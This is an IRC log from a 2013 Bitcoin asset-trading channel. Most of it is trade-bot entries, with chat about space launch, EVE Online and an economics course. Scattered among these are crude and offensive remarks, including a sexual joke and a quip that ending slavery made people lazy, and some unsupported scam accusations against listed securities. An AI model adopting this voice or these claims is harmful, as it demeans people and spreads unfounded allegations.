ticker | Best bid: 144.27950, Best ask: 144.98998, Bid-ask spread: 0.71048, Last trade: 144.27950, 24 hour volume: 18093.68181500, 24 hour low: 140.22000, 24 hour high: 147.29000, 24 hour vwap: 143.80312 Sep 02 01:45:43 ;;ticker --market all Sep 02 01:45:49 MtGox BTCUSD last: 144.27950, vol: 18065.48008681 | Bitstamp BTCUSD last: 129.69, vol: 10655.45683343 | BTC-E BTCUSD last: 125.301, vol: 3304.20231 | Bitfinex BTCUSD last: 130.66, vol: 1755.49122096 | CampBX BTCUSD last: 129.00, vol: 586.4163126 | Volume-weighted last average: 136.974954647 Sep 02 01:46:59 [BTCTC] [PETA-MINE] 4 @ 0.6526 = 2.6104 BTC [+] Sep 02 01:47:10 [BTCTC] [LABCOIN] 56 @ 0.003774 = 0.2113 BTC [+] Sep 02 01:47:36 [MPEX] [S.MPOE] 6979 @ 0.00085587 = 5.9731 BTC [-] Sep 02 01:47:57 [BTCTC] [LABCOIN] 56 @ 0.003774 = 0.2113 BTC [+] Sep 02 01:48:55 [BTCTC] [LABCOIN] 6 @ 0.003775 = 0.0227 BTC [+] Sep 02 01:49:08 is it just me or does PETA-MINE sound like someone elbow deep in an animal lovers ass Sep 02 01:49:48 [BTCTC] [LABCOIN] 1500 @ 0.003774 = 5.661 BTC [-] Sep 02 01:50:02 [BTCTC] [LABCOIN] 50 @ 0.003774 = 0.1887 BTC [-] Sep 02 01:51:55 [BTCTC] [LABCOIN] 50 @ 0.003774 = 0.1887 BTC [-] Sep 02 01:53:37 [BTCTC] [LABCOIN] 19 @ 0.003775 = 0.0717 BTC [+] Sep 02 01:53:52 [BTCTC] [LABCOIN] 82 @ 0.003775 = 0.3096 BTC [+] Sep 02 01:55:57 [BTCTC] [LABCOIN] 262 @ 0.003775 = 0.9891 BTC [+] Sep 02 01:57:56 [BTCTC] [LABCOIN] 69 @ 0.003775 = 0.2605 BTC [+] Sep 02 01:59:08 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] Sep 02 01:59:53 [BTCTC] [LABCOIN] 69 @ 0.003775 = 0.2605 BTC [+] Sep 02 02:00:52 [BTCTC] [LABCOIN] 6 @ 0.003776 = 0.0227 BTC [+] Sep 02 02:01:57 [BTCTC] [LABCOIN] 71 @ 0.003776 = 0.2681 BTC [+] Sep 02 02:02:09 prolly should register iota-mine just in case. Sep 02 02:03:27 [BTCTC] [LABCOIN] 25 @ 0.003777 = 0.0944 BTC [+] Sep 02 02:03:56 [BTCTC] [LABCOIN] 150 @ 0.003777 = 0.5666 BTC [+] Sep 02 02:04:38 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Sep 02 02:05:56 [BTCTC] [LABCOIN] 97 @ 0.003777 = 0.3664 BTC [+] Sep 02 02:07:55 [BTCTC] [LABCOIN] 97 @ 0.003777 = 0.3664 BTC [+] Sep 02 02:09:09 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [+] Sep 02 02:09:54 [BTCTC] [LABCOIN] 97 @ 0.003777 = 0.3664 BTC [+] Sep 02 02:10:14 [BTCTC] [ASICMINER-PT] 3 @ 2.489 = 7.467 BTC [-] Sep 02 02:11:18 [BTCTC] [LABCOIN] 38 @ 0.003778 = 0.1436 BTC [+] Sep 02 02:11:58 [BTCTC] [LABCOIN] 61 @ 0.003778 = 0.2305 BTC [+] Sep 02 02:12:07 [BTCTC] [BITVPS] 1 @ 0.002301 BTC [-] Sep 02 02:12:08 [BTCTC] [BITVPS] 10 @ 0.002301 = 0.023 BTC [-] Sep 02 02:12:11 péta means farted, in French Sep 02 02:12:24 [BTCTC] [BITVPS] 225 @ 0.0023 = 0.5175 BTC [-] Sep 02 02:13:19 [BTCTC] [BASIC-MINING] 1 @ 0.1795 BTC [-] Sep 02 02:13:40 [BTCTC] [BASIC-MINING] 3 @ 0.1795 = 0.5385 BTC [-] Sep 02 02:13:57 [BTCTC] [LABCOIN] 120 @ 0.003778 = 0.4534 BTC [+] Sep 02 02:14:13 like everything else :D Sep 02 02:15:51 [BTCTC] [LABCOIN] 120 @ 0.003778 = 0.4534 BTC [+] Sep 02 02:17:51 [BTCTC] [LABCOIN] 120 @ 0.003778 = 0.4534 BTC [+] Sep 02 02:19:15 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [-] Sep 02 02:19:30 [BTCTC] [LABCOIN] 141 @ 0.003778 = 0.5327 BTC [+] Sep 02 02:19:31 [BTCTC] [LABCOIN] 534 @ 0.003777 = 2.0169 BTC [-] Sep 02 02:19:33 [BTCTC] [LABCOIN] 723 @ 0.003776 = 2.73 BTC [-] Sep 02 02:19:34 [BTCTC] [LABCOIN] 126 @ 0.003775 = 0.4757 BTC [-] Sep 02 02:19:43 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [-] Sep 02 02:19:54 YOTA-MINE Sep 02 02:20:37 YODA-MINE Sep 02 02:20:40 DIBS Sep 02 02:21:39 I want a logo of Yoda, eyes closed, force-hands above his head with a thought bubble containing a hash, indicating Yoda is force-mining! Sep 02 02:22:30 MY IPO WILL SELL OUT IN MINUTES Sep 02 02:23:22 [HAVELOCK] [XBOND] 1 @ 0.00108 BTC [+] Sep 02 02:27:59 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 02 02:28:48 [BTCTC] [ASICMINER-PT] 1 @ 2.432 BTC [-] Sep 02 02:29:03 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 02 02:29:31 [BTCTC] [CB.IDIFF-O] 1 @ 0.009899 BTC [+] Sep 02 02:30:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.0234 = 0.234 BTC [+] Sep 02 02:30:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.02341 = 0.2341 BTC [+] Sep 02 02:34:52 [HAVELOCK] [AM100] 5 @ 0.02389 = 0.1195 BTC [-] Sep 02 02:34:56 [HAVELOCK] [AM100] 10 @ 0.0239 = 0.239 BTC [+] Sep 02 02:39:20 force-mining lol Sep 02 02:39:32 YES! Sep 02 02:39:51 I don't sell a product, I teach you how to do it, young padawan. Sep 02 02:40:44 [MPEX] [S.MPOE] 10800 @ 0.00085766 = 9.2627 BTC [+] Sep 02 02:40:46 [MPEX] [S.MPOE] 1606 @ 0.00085587 = 1.3745 BTC [-] Sep 02 02:43:45 [BTCTC] [COGNITIVE] 2 @ 0.25 = 0.5 BTC [-] Sep 02 02:43:47 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [-] Sep 02 02:43:48 [BTCTC] [COGNITIVE] 10 @ 0.249 = 2.49 BTC [-] Sep 02 02:44:19 [BTCTC] [DMS.PURCHASE] 60 @ 0.01585 = 0.951 BTC [-] Sep 02 02:47:31 [BTCTC] [LABCOIN] 11 @ 0.003778 = 0.0416 BTC [+] Sep 02 02:47:46 [BTCTC] [PETA-MINE] 7 @ 0.65 = 4.55 BTC [-] Sep 02 02:48:31 [BTCTC] [LABCOIN] 223 @ 0.003775 = 0.8418 BTC [-] Sep 02 02:49:16 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008406 = 0.0017 BTC [-] Sep 02 02:49:36 i think they probably have that already Sep 02 02:49:38 in nigerian. Sep 02 02:50:20 bambara or the fuck it i.s Sep 02 02:53:32 [MPEX] [S.MPOE] 7491 @ 0.00085388 = 6.3964 BTC [-] Sep 02 02:53:58 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [-] Sep 02 02:55:39 [BTCTC] [DMS.SELLING] 19 @ 0.01343 = 0.2552 BTC [-] Sep 02 02:58:27 [BTCTC] [LABCOIN] 275 @ 0.003778 = 1.039 BTC [+] Sep 02 02:58:40 [BTCTC] [DMS.MINING] 3 @ 0.002997 = 0.009 BTC [-] Sep 02 03:00:18 [BTCTC] [ACTIVEMINING] 10 @ 0.003309 = 0.0331 BTC [+] Sep 02 03:00:37 [BTCTC] [ACTIVEMINING] 10 @ 0.00331 = 0.0331 BTC [+] Sep 02 03:00:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.02375 = 0.2375 BTC [+] Sep 02 03:01:21 [BTCTC] [ACTIVEMINING] 200 @ 0.003315 = 0.663 BTC [+] Sep 02 03:01:40 [BTCTC] [ACTIVEMINING] 50 @ 0.003316 = 0.1658 BTC [+] Sep 02 03:01:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.02375 = 0.2375 BTC [+] Sep 02 03:02:12 [BTCTC] [ACTIVEMINING] 6 @ 0.003315 = 0.0199 BTC [-] Sep 02 03:02:19 [BTCTC] [DMS.MINING] 1 @ 0.0029 BTC [-] Sep 02 03:02:21 [BTCTC] [DMS.MINING] 18 @ 0.0028 = 0.0504 BTC [-] Sep 02 03:02:22 [HAVELOCK] [XBOND] 4 @ 0.00108 = 0.0043 BTC [+] Sep 02 03:02:39 [HAVELOCK] [XBOND] 2 @ 0.00108 = 0.0022 BTC [+] Sep 02 03:03:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.02376 = 0.2376 BTC [+] Sep 02 03:03:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02377 BTC [+] Sep 02 03:03:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02378 BTC [+] Sep 02 03:03:37 [BTCTC] [TAT.ASICMINER] 18 @ 0.02379 = 0.4282 BTC [+] Sep 02 03:03:38 [BTCTC] [DMS.PURCHASE] 21 @ 0.01585 = 0.3329 BTC [-] Sep 02 03:06:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.02379 = 0.4758 BTC [+] Sep 02 03:08:08 [BTCTC] [TAT.ASICMINER] 7 @ 0.02379 = 0.1665 BTC [+] Sep 02 03:09:15 [BTCTC] [ACTIVEMINING] 5 @ 0.003315 = 0.0166 BTC [-] Sep 02 03:09:56 [BTCTC] [LABCOIN] 250 @ 0.003774 = 0.9435 BTC [-] Sep 02 03:11:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.02378 = 0.1665 BTC [-] Sep 02 03:11:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.02379 = 0.2379 BTC [+] Sep 02 03:12:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.0238 = 0.119 BTC [+] Sep 02 03:13:28 [BTCTC] [LABCOIN] 400 @ 0.003702 = 1.4808 BTC [-] Sep 02 03:14:37 [BTCTC] [LABCOIN] 5 @ 0.003777 = 0.0189 BTC [+] Sep 02 03:16:48 [BTCTC] [LTC-ATF.B2] 1 @ 0.0104 BTC [+] Sep 02 03:18:57 [BTCTC] [DMS.MINING] 482 @ 0.0028 = 1.3496 BTC [-] Sep 02 03:18:58 [BTCTC] [DMS.MINING] 500 @ 0.002795 = 1.3975 BTC [-] Sep 02 03:18:59 [BTCTC] [DMS.MINING] 5 @ 0.002792 = 0.014 BTC [-] Sep 02 03:19:00 [BTCTC] [DMS.MINING] 1 @ 0.002792 BTC [-] Sep 02 03:19:01 [BTCTC] [DMS.MINING] 2 @ 0.00279 = 0.0056 BTC [-] Sep 02 03:19:02 [BTCTC] [DMS.MINING] 30 @ 0.002789 = 0.0837 BTC [-] Sep 02 03:19:03 [BTCTC] [DMS.MINING] 283 @ 0.002788 = 0.789 BTC [-] Sep 02 03:19:05 [BTCTC] [DMS.MINING] 333 @ 0.002784 = 0.9271 BTC [-] Sep 02 03:19:06 [BTCTC] [DMS.MINING] 20 @ 0.00278 = 0.0556 BTC [-] Sep 02 03:19:07 [BTCTC] [DMS.MINING] 2000 @ 0.002777 = 5.554 BTC [-] Sep 02 03:21:19 [BTCTC] [DMS.SELLING] 3 @ 0.01343 = 0.0403 BTC [-] Sep 02 03:21:52 [BTCTC] [LABCOIN] 150 @ 0.003703 = 0.5555 BTC [-] Sep 02 03:21:52 [BTCTC] [LABCOIN] 378 @ 0.003702 = 1.3994 BTC [-] Sep 02 03:21:54 [BTCTC] [LABCOIN] 3037 @ 0.0037 = 11.2369 BTC [-] Sep 02 03:22:12 [BTCTC] [LABCOIN] 378 @ 0.0037 = 1.3986 BTC [-] Sep 02 03:26:48 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 02 03:26:50 [BTCTC] [ASICMINER-PT] 2 @ 2.521 = 5.042 BTC [+] Sep 02 03:26:51 [BTCTC] [ASICMINER-PT] 1 @ 2.523 BTC [+] Sep 02 03:26:52 [BTCTC] [ASICMINER-PT] 1 @ 2.523 BTC [+] Sep 02 03:35:36 [BTCTC] [ACTIVEMINING] 1 @ 0.00324 BTC [-] Sep 02 03:38:12 [BTCTC] [BASIC-MINING] 1 @ 0.1712 BTC [-] Sep 02 03:38:13 [BTCTC] [BASIC-MINING] 1 @ 0.1711 BTC [-] Sep 02 03:38:15 [BTCTC] [BASIC-MINING] 1 @ 0.1711 BTC [-] Sep 02 03:38:16 [BTCTC] [BASIC-MINING] 2 @ 0.171 = 0.342 BTC [-] Sep 02 03:38:17 [BTCTC] [BASIC-MINING] 1 @ 0.1706 BTC [-] Sep 02 03:42:17 http://trilema.com/2013/the-linguistic-mark-of-cultural-failure/ < possibly the most offensive thing i've ever written. Sep 02 03:42:32 The linguistic mark of cultural failure pe Trilema - Un blog de Mircea Popescu. Sep 02 03:46:39 http://en.wikipedia.org/wiki/Space_gun <- why the fuck aren't we funding this stuff? Sep 02 03:46:41 [HAVELOCK] [XBOND] 8 @ 0.00108 = 0.0086 BTC [+] Sep 02 03:46:58 mircea_popescu: I have an offensive theory. The end of slavery has made people lazy. Sep 02 03:47:03 boom Sep 02 03:47:38 lolk Sep 02 03:47:48 [BTCTC] [DMS.SELLING] 2 @ 0.01342 = 0.0268 BTC [-] Sep 02 03:47:50 [HAVELOCK] [SDSTM] 18 @ 0.00371999 = 0.067 BTC [+] Sep 02 03:48:40 thestringpuller we're not financing it becauser it's fucking impossible to shoot something into orbit Sep 02 03:49:51 for every 1 tank of fuel you want to send into space it takes about 9 fuel tanks to get it into orbit using rockets Sep 02 03:49:54 [BTCTC] [ACTIVEMINING] 3 @ 0.003237 = 0.0097 BTC [-] Sep 02 03:50:09 but you can Sep 02 03:50:10 't shoot it. Sep 02 03:50:27 look, even wikipedia knows this Sep 02 03:50:27 A space gun, by itself, is not capable of placing objects into stable orbit around the object (planet or otherwise) from which it is launched. The laws of two-body gravitation make it impossible to reach a stable orbit Sep 02 03:50:34 i wonder what will be the most cost effective way of getting something into orbit in the future Sep 02 03:51:04 you need a directional burn perpindicular to the initial apoasis in order to achieve a stable orbit Sep 02 03:51:21 you can't do that with a gun Sep 02 03:51:25 so yea Sep 02 03:51:33 [BTCTC] [ACTIVEMINING] 10 @ 0.003236 = 0.0324 BTC [-] Sep 02 03:51:42 right. Sep 02 03:51:47 so if you're always going to do a rocket Sep 02 03:51:52 might as well do a rocket in the first place. Sep 02 03:51:57 [BTCTC] [DMS.MINING] 5 @ 0.002992 = 0.015 BTC [+] Sep 02 03:51:58 im pretty sure that was the thinking. Sep 02 03:52:04 after all, zee germanz invented rocketry. Sep 02 03:52:12 [BTCTC] [ACTIVEMINING] 15 @ 0.003236 = 0.0485 BTC [-] Sep 02 03:52:26 [BTCTC] [DMS.MINING] 2 @ 0.002777 = 0.0056 BTC [-] Sep 02 03:52:29 rockets feel so, archaic Sep 02 03:52:39 yes they work, but they are fuel hogs Sep 02 03:52:40 lol and goons feel fresh ? Sep 02 03:52:52 LOL Sep 02 03:53:05 i guess the world of eve won't be in our lifetime ;) Sep 02 03:53:14 i cant get over the fact that you play eve online mircea_popescu Sep 02 03:53:22 [BTCTC] [DMS.PURCHASE] 2 @ 0.01585 = 0.0317 BTC [-] Sep 02 03:53:25 grubles why not ?! Sep 02 03:53:41 because youre like a romanian pimp Sep 02 03:53:46 ...that plays eve online Sep 02 03:53:56 i do lots of random stupid shit. Sep 02 03:54:00 im having a hard time wrapping my head around that Sep 02 03:54:37 by all means, keep playing Sep 02 03:54:39 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [-] Sep 02 03:54:39 i think its awesome Sep 02 03:55:06 [BTCTC] [BTC-BOND] 4 @ 0.009998 = 0.04 BTC [+] Sep 02 03:55:20 the entire eve economy is 1.5% of S.MPOE Sep 02 03:55:23 lol Sep 02 03:56:00 do you know one of the two people killed in benghazi was playing eve at the time ? Sep 02 03:56:12 TIL Sep 02 03:56:14 thestringpuller ya lol, i wonder what ppl will do when they'll realise that. Sep 02 03:56:21 damn whos gonna take their loot then??? Sep 02 03:56:39 all those skill points wasted Sep 02 03:56:42 shucks Sep 02 03:56:48 btw Sep 02 03:56:54 ill sell you my account Sep 02 03:57:01 anything good on it ? Sep 02 03:57:07 i dunno Sep 02 03:57:17 my character with shit tons of SP Sep 02 03:58:23 i think that is what is cool about eve Sep 02 03:58:25 thestringpuller: look into Skylon Sep 02 03:58:27 you can sell your character no problem Sep 02 03:58:50 thestringpuller: http://www.reactionengines.co.uk/ Sep 02 03:58:53 well you're gonna have to get a lot more specific. Sep 02 03:58:59 thestringpuller: ssto, airbreathing up to mach5 Sep 02 03:59:17 thestringpuller: internal o2 supplies for final orbital insertion Sep 02 03:59:44 all i know is that my character was named dankherbz Sep 02 04:00:08 http://evewho.com/pilot/dankherbz Sep 02 04:00:09 Eve Who - Pilot - dankherbz Sep 02 04:00:12 i look like don draper Sep 02 04:00:17 lemme look benkay Sep 02 04:00:24 damn Sep 02 04:00:26 circa 2008 Sep 02 04:00:33 didnt know i had that char that long Sep 02 04:01:36 send me an api thing Sep 02 04:02:36 i forget how Sep 02 04:03:36 benkay: I don't think these have payload capacity I would be looking for Sep 02 04:04:21 think about the shuttle and how much fuel is used Sep 02 04:04:25 [BTCTC] [PETA-MINE] 4 @ 0.65 = 2.6 BTC [-] Sep 02 04:04:30 for brinigng something into space Sep 02 04:05:00 no way you could build a star destroyer or capital ship in even low earth orbit, without spending trillions of dollars Sep 02 04:05:16 what part of air breathing to mach five do you not understand? Sep 02 04:05:30 i'm not talking about pilots Sep 02 04:05:57 dear god Sep 02 04:06:09 it uses ambient o2 to fuel takeoff up to and including mach 5 Sep 02 04:06:18 nothing to do with life support systems Sep 02 04:07:09 right. but the payload looks less than a kilogram or so Sep 02 04:07:20 I want to be able to launch the fucking pyramids into space Sep 02 04:07:39 if you think you can use a gun for that... Sep 02 04:07:49 hahaha Sep 02 04:08:12 okay nevermind 12,000 kg is maximum payload Sep 02 04:08:21 anyway, your capital ship would probably be made of styrofoam Sep 02 04:08:29 XD why?!? Sep 02 04:08:32 if you have "shields" you will never use metal structure. Sep 02 04:08:37 oh yea Sep 02 04:08:42 just em hardened styrofoam Sep 02 04:08:49 cause em is way cheaper than mass. Sep 02 04:08:51 energy based shields I guess Sep 02 04:09:05 furthermore, you'll never haul mass up to LEO, you'll drop mass down from the moon or the belts Sep 02 04:09:12 ^ Sep 02 04:09:52 You have to farm asteroids for the metal, not rocket it into orbit. Sep 02 04:10:00 ^ Sep 02 04:10:10 lol it's a eyebrow party. Sep 02 04:10:10 you see thestringpuller? physics in the haus. Sep 02 04:10:11 It's already out there in outrageous amounts Sep 02 04:10:32 *raises roof* Sep 02 04:10:42 \m/ PHYSICS! Sep 02 04:10:43 Namworld: and let's not even talk about the ludicrous amounts of energy to be harvested up there Sep 02 04:10:59 can I join your corp mircea_popescu Sep 02 04:11:02 vapor-deposition solar panels Sep 02 04:11:07 sure. Sep 02 04:11:16 no more sawing cylinders into wafers Sep 02 04:11:33 Maybe I should start playing EVE too. But I'm so busy. Sep 02 04:11:49 i recomend taking another gf rather than eve Sep 02 04:11:53 unless you already have 3-4 Sep 02 04:12:29 That's a much better option Sep 02 04:12:32 amen to that Sep 02 04:12:46 and maybe a business too Sep 02 04:13:28 I already have a business and spare ones to work on/with Sep 02 04:14:32 lol Sep 02 04:14:33 Namworld you took over Bitvps because of your experience with Namworld I presume? Sep 02 04:14:34 i was kiddin Sep 02 04:15:19 No, because I had a large stake RG sold me -.- Sep 02 04:16:45 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [-] Sep 02 04:17:32 bitches don't know about my space elevators Sep 02 04:20:59 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [-] Sep 02 04:21:00 [BTCTC] [ASICMINER-PT] 2 @ 2.43 = 4.86 BTC [-] Sep 02 04:21:02 [BTCTC] [ASICMINER-PT] 1 @ 2.429 BTC [-] Sep 02 04:21:03 [BTCTC] [ASICMINER-PT] 3 @ 2.428 = 7.284 BTC [-] Sep 02 04:21:03 [BTCTC] [ASICMINER-PT] 3 @ 2.427 = 7.281 BTC [-] Sep 02 04:21:05 [BTCTC] [ASICMINER-PT] 2 @ 2.424 = 4.848 BTC [-] Sep 02 04:21:06 [BTCTC] [ASICMINER-PT] 15 @ 2.423 = 36.345 BTC [-] Sep 02 04:21:07 [BTCTC] [ASICMINER-PT] 1 @ 2.423 BTC [-] Sep 02 04:21:08 [BTCTC] [ASICMINER-PT] 1 @ 2.416 BTC [-] Sep 02 04:21:09 [BTCTC] [ASICMINER-PT] 1 @ 2.411 BTC [-] Sep 02 04:21:10 [BTCTC] [ASICMINER-PT] 9 @ 2.41 = 21.69 BTC [-] Sep 02 04:21:11 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] Sep 02 04:21:13 [BTCTC] [ASICMINER-PT] 3 @ 2.403 = 7.209 BTC [-] Sep 02 04:21:14 [BTCTC] [ASICMINER-PT] 1 @ 2.402 BTC [-] Sep 02 04:21:15 [BTCTC] [ASICMINER-PT] 3 @ 2.402 = 7.206 BTC [-] Sep 02 04:21:15 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] Sep 02 04:21:16 [BTCTC] [ASICMINER-PT] 2 @ 2.401 = 4.802 BTC [-] Sep 02 04:22:19 [BTCTC] [LABCOIN] 10 @ 0.003702 = 0.037 BTC [+] Sep 02 04:22:21 [BTCTC] [LABCOIN] 10 @ 0.003701 = 0.037 BTC [-] Sep 02 04:24:31 [BTCTC] [BASIC-MINING] 1 @ 0.1705 BTC [-] Sep 02 04:24:32 [BTCTC] [BASIC-MINING] 2 @ 0.1681 = 0.3362 BTC [-] Sep 02 04:24:34 [BTCTC] [BASIC-MINING] 8 @ 0.168 = 1.344 BTC [-] Sep 02 04:24:35 [BTCTC] [BASIC-MINING] 5 @ 0.1662 = 0.831 BTC [-] Sep 02 04:24:36 [BTCTC] [BASIC-MINING] 10 @ 0.1661 = 1.661 BTC [-] Sep 02 04:24:37 [BTCTC] [BASIC-MINING] 10 @ 0.166 = 1.66 BTC [-] Sep 02 04:24:38 [BTCTC] [BASIC-MINING] 2 @ 0.1656 = 0.3312 BTC [-] Sep 02 04:24:39 [BTCTC] [BASIC-MINING] 10 @ 0.1655 = 1.655 BTC [-] Sep 02 04:24:40 [BTCTC] [BASIC-MINING] 1 @ 0.1654 BTC [-] Sep 02 04:24:41 [BTCTC] [BASIC-MINING] 30 @ 0.1653 = 4.959 BTC [-] Sep 02 04:24:42 [BTCTC] [BASIC-MINING] 40 @ 0.1652 = 6.608 BTC [-] Sep 02 04:24:43 [BTCTC] [BASIC-MINING] 15 @ 0.165 = 2.475 BTC [-] Sep 02 04:25:09 apropos only of oddball methods of achieving orbit, this one made me chuckle: you fire your payload directly up into the path of a passing payload-catcher, which opens its payload-catching bay at precisely the right time to accept your payload without losing a terrible amount of the gas in the bay, and closing the door behind the payload. payload compresses gas in intake bay as form of shock absorber. Sep 02 04:26:35 benkay what if there's nothing to open ? Sep 02 04:26:52 suppose the receiving end is a magnetite piston. Sep 02 04:27:11 another one i've always found similarly amusing and less idiotic: have a giant sheet of aluminum zipping around up in orbit. lob payload over it, and as payload clears apogee the film goes zipping by underneath. magnets in the payload set up eddy currents in the strip of aluminum, providing the forward oomph to accelerate payload. repeat with several more strips. Sep 02 04:27:17 [BTCTC] [BASIC-MINING] 131 @ 0.165 = 21.615 BTC [-] Sep 02 04:27:26 labcoin not a scam after all i guess Sep 02 04:27:44 zacm who are you and what's the guess based on. Sep 02 04:27:45 mircea_popescu: replace with your choice of shock absorber. it's all just engineering. Sep 02 04:28:18 basically this sounds like someone was playing arkanoid while high. Sep 02 04:28:57 being high can lead to good ideas Sep 02 04:29:05 it can also lead to bad ideas Sep 02 04:29:26 take for instance this branding job: http://www.ohcoop.org/ Sep 02 04:30:00 (i challenge you to watch the explanatory video all the way through) Sep 02 04:30:25 i lose, not much into vid stuff. Sep 02 04:31:32 [BTCTC] [LTC-ATF.B2] 1 @ 0.0104 BTC [+] Sep 02 04:31:58 anyways. product of the fevered and perpetually intoxicated imaginations at http://420creative.com/ Sep 02 04:38:07 labcoin is not ordinary scame Sep 02 04:38:10 scam* Sep 02 04:38:13 el super scam Sep 02 04:39:02 mircea_popescu: I love Chetts comment on the prosecution of sexual activity article Sep 02 04:39:41 [BTCTC] [DMS.SELLING] 49 @ 0.0129 = 0.6321 BTC [-] Sep 02 04:40:09 "Apparently this writing words thing isn.t for everyone." wow perfect Sep 02 04:40:42 lol Sep 02 04:41:31 anyway, tha'ts all for me. take it ezzy Sep 02 04:41:37 later mang **** BEGIN LOGGING AT Tue Sep 3 08:14:09 2013 Sep 03 08:15:45 [BTCTC] [S.MPOE-PT] 6 @ 0.0008979 = 0.0054 BTC [+] Sep 03 08:18:13 [BTCTC] [ACTIVEMINING] 382 @ 0.003599 = 1.3748 BTC [+] Sep 03 08:18:42 [HAVELOCK] [LABCO] 30 @ 0.003199 = 0.096 BTC [-] Sep 03 08:19:50 [BTCTC] [DMS.MINING] 1 @ 0.003089 BTC [+] Sep 03 08:19:56 [HAVELOCK] [AM100] 800 @ 0.02201 = 17.608 BTC [+] Sep 03 08:22:14 [BTCTC] [ACTIVEMINING] 5 @ 0.003597 = 0.018 BTC [-] Sep 03 08:23:48 [BTCTC] [BASIC-MINING] 51 @ 0.137 = 6.987 BTC [+] Sep 03 08:25:12 [BTCTC] [BASIC-MINING] 34 @ 0.137 = 4.658 BTC [+] Sep 03 08:25:27 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.000631 = 0.0044 BTC [-] Sep 03 08:25:29 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.000631 = 0.0101 BTC [-] Sep 03 08:26:23 [BTCTC] [LABCOIN] 20 @ 0.00359 = 0.0718 BTC [-] Sep 03 08:27:46 [BTCTC] [LABCOIN] 1500 @ 0.00359 = 5.385 BTC [-] Sep 03 08:27:48 [BTCTC] [LABCOIN] 166 @ 0.003552 = 0.5896 BTC [-] Sep 03 08:27:49 [BTCTC] [LABCOIN] 1200 @ 0.003551 = 4.2612 BTC [-] Sep 03 08:27:50 [BTCTC] [LABCOIN] 175 @ 0.00354 = 0.6195 BTC [-] Sep 03 08:27:51 [BTCTC] [LABCOIN] 93 @ 0.00354 = 0.3292 BTC [-] Sep 03 08:27:52 [BTCTC] [LABCOIN] 500 @ 0.003539 = 1.7695 BTC [-] Sep 03 08:27:53 [BTCTC] [LABCOIN] 1366 @ 0.003538 = 4.8329 BTC [-] Sep 03 08:30:01 [BTCTC] [S.BBET-PT] 1 @ 0.001584 BTC [+] Sep 03 08:33:40 [BTCTC] [ACTIVEMINING] 382 @ 0.00355 = 1.3561 BTC [-] Sep 03 08:33:55 [BTCTC] [S.BBET-PT] 1 @ 0.000701 BTC [-] Sep 03 08:35:38 https://class.coursera.org/money-001/lecture/index Sep 03 08:35:42 this is fascinating stuff Sep 03 08:35:44 Coursera.org Sep 03 08:35:56 started this week you can still get in Sep 03 08:36:49 Economics of Money and Banking Sep 03 08:37:05 by whom ? Sep 03 08:37:13 [BTCTC] [S.MPOE-PT] 1 @ 0.0008979 BTC [+] Sep 03 08:37:16 some dude Sep 03 08:37:19 ya well... Sep 03 08:37:50 he places himsel ideologically nowhere Sep 03 08:37:56 he says he belongs to his own school lol Sep 03 08:38:02 herp. Sep 03 08:38:05 [BTCTC] [S.BBET-PT] 1 @ 0.001584 BTC [+] Sep 03 08:38:06 but what's interesting is that he says he talks a lot to poeple who work in banking Sep 03 08:38:22 how's he different from all the tards starting ipos ? how can i distinguish him from kludge ? Sep 03 08:38:24 [BTCTC] [PETA-MINE] 3 @ 0.6301 = 1.8903 BTC [-] Sep 03 08:38:28 so it looks like the course will get you a good overview and understanding how shit runs right now Sep 03 08:38:37 [HAVELOCK] [AM100] 178 @ 0.02201 = 3.9178 BTC [+] Sep 03 08:38:40 huh Sep 03 08:38:44 he's a professor doing lectures Sep 03 08:38:56 [HAVELOCK] [AM100] 10 @ 0.02296 = 0.2296 BTC [+] Sep 03 08:39:00 professor where ? Sep 03 08:39:08 columbia university Sep 03 08:39:21 mk. Sep 03 08:39:33 i dont think i'll agree with all his conclusions, (he's not austrian and hasn't mentioned them) Sep 03 08:39:36 but Sep 03 08:39:47 [HAVELOCK] [AM100] 50 @ 0.02297 = 1.1485 BTC [+] Sep 03 08:39:51 wait,,, Sep 03 08:39:59 i guess its still interesting to get to know how the banking shit all works n st uff Sep 03 08:40:03 "Economics of Money and Banking", no mention of... economics ? Sep 03 08:40:05 great. Sep 03 08:40:09 [HAVELOCK] [AM100] 10 @ 0.02298 = 0.2298 BTC [+] Sep 03 08:40:13 hah Sep 03 08:40:13 [HAVELOCK] [AM100] 5 @ 0.02298978 = 0.1149 BTC [+] Sep 03 08:40:16 [HAVELOCK] [AM100] 50 @ 0.02298979 = 1.1495 BTC [+] Sep 03 08:40:19 [HAVELOCK] [AM100] 225 @ 0.0229898 = 5.1727 BTC [+] Sep 03 08:40:23 [HAVELOCK] [AM100] 10 @ 0.02299 = 0.2299 BTC [+] Sep 03 08:40:25 This course offers an introduction to a .money view. of economic activity for modern times, building on the intellectual traditions of British central banking and American institutionalism. Part One explores the economics of payment systems and money markets. Part Two explores connections with foreign exchange and capital markets. Sep 03 08:40:32 that retarded link wants me to login on the strength of "Economics of Money 